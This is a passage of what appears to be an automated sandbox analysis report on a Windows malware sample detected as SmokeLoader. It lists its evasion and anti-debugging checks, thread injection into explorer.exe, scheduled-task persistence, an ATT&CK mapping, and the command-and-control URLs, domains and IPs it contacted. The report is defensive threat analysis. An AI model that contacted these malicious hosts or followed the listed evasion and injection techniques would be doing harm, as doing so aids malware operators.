      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ichffhiJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\586.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ichffhiJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Deletes itself after installation
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ichffhi:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: file.exe, 00000000.00000002.378885385.0000000000663000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKRCP
      Checks if the current machine is a virtual machine (disk enumeration)
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Windows\explorer.exe TID: 4400Thread sleep count: 664 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 60Thread sleep count: 430 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 60Thread sleep time: -43000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4600Thread sleep count: 428 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4600Thread sleep time: -42800s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 5912Thread sleep count: 548 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5284Thread sleep count: 358 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5284Thread sleep time: -35800s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 6096Thread sleep count: 323 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6096Thread sleep time: -32300s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\586.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-8932
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 664Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 430Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 428Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 548Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 358Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\586.exeAPI coverage: 6.5 %
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
      Source: explorer.exe, 00000001.00000000.376052917.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000001.00000000.311877764.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.349489982.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
      Source: explorer.exe, 00000001.00000000.349489982.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.362187206.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.349489982.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000001.00000000.376052917.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

      Anti Debugging

      barindex
      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
      Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004069E1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004069E1
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004135BD LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,6_2_004135BD
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_00414D26 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,6_2_00414D26
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060092B mov eax, dword ptr fs:[00000030h]0_2_0060092B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00600D90 mov eax, dword ptr fs:[00000030h]0_2_00600D90
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00656842 push dword ptr fs:[00000030h]0_2_00656842
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0053092B mov eax, dword ptr fs:[00000030h]2_2_0053092B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00530D90 mov eax, dword ptr fs:[00000030h]2_2_00530D90
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004069E1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004069E1
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_0040C27F SetUnhandledExceptionFilter,6_2_0040C27F
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_00407AAB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00407AAB
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_0040B345 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0040B345

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Benign windows process drops PE files
      Source: C:\Windows\explorer.exeFile created: ichffhi.1.drJump to dropped file
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
      Source: C:\Windows\explorer.exeNetwork Connect: 213.227.155.16 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: gayworld.at
      Source: C:\Windows\explorer.exeDomain query: disk.yandex.ru
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Creates a thread in another existing process (thread injection)
      Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 2901A18Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiThread created: unknown EIP: 5331A18Jump to behavior
      Source: explorer.exe, 00000001.00000000.376289740.00000000086C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.371618606.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.312031629.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.312031629.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360392080.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.340880524.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
      Source: explorer.exe, 00000001.00000000.312031629.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360392080.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.340880524.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.312031629.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360392080.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.340880524.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.359782286.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.311808004.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.340352821.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: GetLocaleInfoA,6_2_00415B8C
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_0040CE4F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_0040CE4F
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004059A0 GetGeoInfoA,GetLastError,GetGeoInfoA,GetSystemDefaultLCID,GlobalAlloc,VirtualProtect,GetVersion,WriteConsoleW,GetLastError,HeapFree,SetConsoleCursorInfo,FindNextFileA,_fseek,__floor_pentium4,__floor_pentium4,_puts,FoldStringA,_feof,_fsetpos,_fprintf,GetBinaryTypeW,LocalAlloc,GetBinaryTypeW,CreateMutexA,ConvertFiberToThread,SetFileAttributesW,AddAtomA,ConvertFiberToThread,SetFileAttributesW,AddAtomA,SetFileShortNameW,GetFileAttributesExW,GetFileType,WritePrivateProfileStringA,GetFileAttributesExW,GetFileType,LocalAlloc,WritePrivateProfileStringA,DeregisterEventSource,GetConsoleAliasA,FindFirstChangeNotificationA,GetFileAttributesA,SetComputerNameA,FindFirstChangeNotificationA,GetFileAttributesA,SetComputerNameA,SetThreadExecutionState,TlsGetValue,SetTimeZoneInformation,GetFileAttributesW,SetFileShortNameA,LoadLibraryA,6_2_004059A0

      Stealing of Sensitive Information

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Native API      		1
      DLL Side-Loading      		32
      Process Injection      		11
      Masquerading      		1
      Input Capture      		1
      System Time Discovery      		Remote Services1
      Input Capture      		Exfiltration Over Other Network Medium11
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Exploitation for Client Execution      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		12
      Virtualization/Sandbox Evasion      		LSASS Memory431
      Security Software Discovery      		Remote Desktop Protocol1
      Archive Collected Data      		Exfiltration Over Bluetooth1
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)32
      Process Injection      		Security Account Manager12
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
      Deobfuscate/Decode Files or Information      		NTDS3
      Process Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer114
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Hidden Files and Directories      		LSA Secrets1
      Application Window Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common2
      Obfuscated Files or Information      		Cached Domain Credentials15
      System Information Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Software Packing      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
      File Deletion      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 719838 Sample: file.exe Startdate: 10/10/2022 Architecture: WINDOWS Score: 100 27 gayworld.at 2->27 37 Snort IDS alert for network traffic 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 4 other signatures 2->43 8 file.exe 2->8         started        11 ichffhi 2->11         started        signatures3 process4 signatures5 45 Detected unpacking (changes PE section rights) 8->45 47 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->47 49 Maps a DLL or memory area into another process 8->49 51 Creates a thread in another existing process (thread injection) 8->51 13 explorer.exe 4 8->13 injected 53 Multi AV Scanner detection for dropped file 11->53 55 Machine Learning detection for dropped file 11->55 57 Checks if the current machine is a virtual machine (disk enumeration) 11->57 process6 dnsIp7 29 123.213.233.194, 49696, 49698, 49703 SKB-ASSKBroadbandCoLtdKR Korea Republic of 13->29 31 gayworld.at 175.120.254.9, 49695, 49702, 49715 SKB-ASSKBroadbandCoLtdKR Korea Republic of 13->31 33 8 other IPs or domains 13->33 21 C:\Users\user\AppData\Roaming\ichffhi, PE32 13->21 dropped 23 C:\Users\user\AppData\Local\Temp\586.exe, PE32 13->23 dropped 25 C:\Users\user\...\ichffhi:Zone.Identifier, ASCII 13->25 dropped 59 System process connects to network (likely due to code injection or exploit) 13->59 61 Benign windows process drops PE files 13->61 63 Deletes itself after installation 13->63 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->65 18 586.exe 13->18         started        file8 signatures9 process10 signatures11 35 Machine Learning detection for dropped file 18->35

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      file.exe44%ReversingLabsWin32.Trojan.Lockbit
      file.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\ichffhi100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\586.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\ichffhi44%ReversingLabsWin32.Trojan.Lockbit

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      2.3.ichffhi.5d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      0.3.file.exe.610000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      2.2.ichffhi.530e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      2.2.ichffhi.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      0.2.file.exe.600e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://ekcentric.com/tmp/0%URL Reputationsafe
      https://thepokeway.nl/upload/index.php0%URL Reputationsafe
      http://cracker.biz/tmp/0%URL Reputationsafe
      http://citnet.ru/tmp/0%URL Reputationsafe
      http://gayworld.at/tmp/0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      thepokeway.nl
      		5.135.247.111
      		truetrue
        		unknown
        gayworld.at
        		175.120.254.9
        		truetrue
          		unknown
          disk.yandex.ru
          		87.250.250.50
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://ekcentric.com/tmp/true
            • URL Reputation: safe
            		unknown
            https://thepokeway.nl/upload/index.phpfalse
            • URL Reputation: safe
            		unknown
            http://cracker.biz/tmp/true
            • URL Reputation: safe
            		unknown
            https://disk.yandex.ru/d/aS1IzKYGKL0Ctwfalse
              		high
              http://citnet.ru/tmp/true
              • URL Reputation: safe
              		unknown
              http://gayworld.at/tmp/true
              • URL Reputation: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.360118573.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.340593765.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.311877764.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                123.213.233.194
                		unknownKorea Republic of
                		9318SKB-ASSKBroadbandCoLtdKRtrue
                109.102.255.230
                		unknownRomania
                		9050RTDBucharestRomaniaROtrue
                5.135.247.111
                		thepokeway.nlFrance
                		16276OVHFRtrue
                195.158.3.162
                		unknownUzbekistan
                		8193BRM-ASUZtrue
                211.171.233.129
                		unknownKorea Republic of
                		3786LGDACOMLGDACOMCorporationKRtrue
                211.171.233.126
                		unknownKorea Republic of
                		3786LGDACOMLGDACOMCorporationKRtrue
                213.227.155.16
                		unknownNetherlands
                		60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                185.95.186.58
                		unknownIraq
                		34515NEXTNET-ASIQtrue
                87.250.250.50
                		disk.yandex.ruRussian Federation
                		13238YANDEXRUfalse
                175.120.254.9
                		gayworld.atKorea Republic of
                		9318SKB-ASSKBroadbandCoLtdKRtrue

                General Information

                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:719838
                Start date and time:2022-10-10 23:18:52 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 15s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@4/3@37/10
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 40.7% (good quality ratio 36.1%)
                • Quality average: 67.2%
                • Quality standard deviation: 34.3%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 29
                • Number of non-executed functions: 35
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • VT rate limit hit for: file.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                23:20:39Task SchedulerRun new task: Firefox Default Browser Agent 13C94503BEEACC71 path: C:\Users\user\AppData\Roaming\ichffhi

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                123.213.233.194file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                rW84nlLvCG.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • rgyui.top/dl/build2.exe
                file.exeGet hashmaliciousBrowse
                • gayworld.at/tmp/
                file.exeGet hashmaliciousBrowse
                • rgyui.top/dl/build2.exe

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                thepokeway.nlfile.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                rW84nlLvCG.exeGet hashmaliciousBrowse
                • 5.135.247.111
                ppXQe2rsJj.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                gayworld.atfile.exeGet hashmaliciousBrowse
                • 109.102.255.230
                file.exeGet hashmaliciousBrowse
                • 211.171.233.129
                file.exeGet hashmaliciousBrowse
                • 203.91.116.53
                file.exeGet hashmaliciousBrowse
                • 181.167.134.24
                rW84nlLvCG.exeGet hashmaliciousBrowse
                • 210.92.250.133
                ppXQe2rsJj.exeGet hashmaliciousBrowse
                • 116.121.62.237
                file.exeGet hashmaliciousBrowse
                • 1.248.122.240
                file.exeGet hashmaliciousBrowse
                • 175.119.10.231
                file.exeGet hashmaliciousBrowse
                • 186.182.55.44
                file.exeGet hashmaliciousBrowse
                • 95.107.163.44
                file.exeGet hashmaliciousBrowse
                • 84.224.193.200
                file.exeGet hashmaliciousBrowse
                • 187.156.51.92
                file.exeGet hashmaliciousBrowse
                • 115.88.24.203
                file.exeGet hashmaliciousBrowse
                • 115.88.24.203
                file.exeGet hashmaliciousBrowse
                • 175.119.10.231
